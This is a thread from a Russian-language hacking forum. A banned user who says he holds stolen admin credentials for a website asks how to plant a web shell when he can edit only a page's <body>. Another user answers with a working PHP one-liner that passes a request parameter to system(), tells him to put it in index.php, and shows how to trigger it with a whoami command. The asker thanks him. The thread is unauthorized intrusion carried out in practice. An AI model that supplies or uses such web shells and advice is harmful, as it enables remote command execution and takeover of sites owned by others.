• XSS.stack #1 – первый литературный журнал от юзеров форума

помощь с web shell

Отслеживать
cheGewara

cheGewara

floppy-диск
Забанен
Регистрация
13.11.2024
Сообщения
5
Реакции
0
Пожалуйста, обратите внимание, что пользователь заблокирован
получил пароли логины от админки и теперь имею доступ к html коду всех страниц, ну как, только к <body></body>. что можно сделать что бы закинуть веб шелл? проблема в том что имею доступ только к части кода
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Paxom сказал(а):
кидаешь код шелла в любой html и меняешь расширение на php ))
не, ты не понял. мне доступен текст html кода страницы. только блок <body> остальное даже не отображается. я пробовал шел weevely вставить но оно не работает так как php код находится внутри html кода в блоке <body>
 
Пожалуйста, обратите внимание, что пользователь заблокирован
dunkel сказал(а):
Если нельзя переименовывать файлы то никак
а зачем переименовывать? я же могу изменить index.php или любую другую страницу. не целиком но чото же можно сделать
 
cheGewara сказал(а):
а зачем переименовывать? я же могу изменить index.php или любую другую страницу. не целиком но чото же можно сделать
Так ты написал что можешь только .html контент редачить. Тогда удали все из index.php, вставь например <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> и открой https://site.com/index.php?cmd=whoami
 
Пожалуйста, обратите внимание, что пользователь заблокирован
dunkel сказал(а):
Так ты написал что можешь только .html контент редачить. Тогда удали все из index.php, вставь например <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> и открой https://site.com/index.php?cmd=whoami
от души бро, реально помог
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх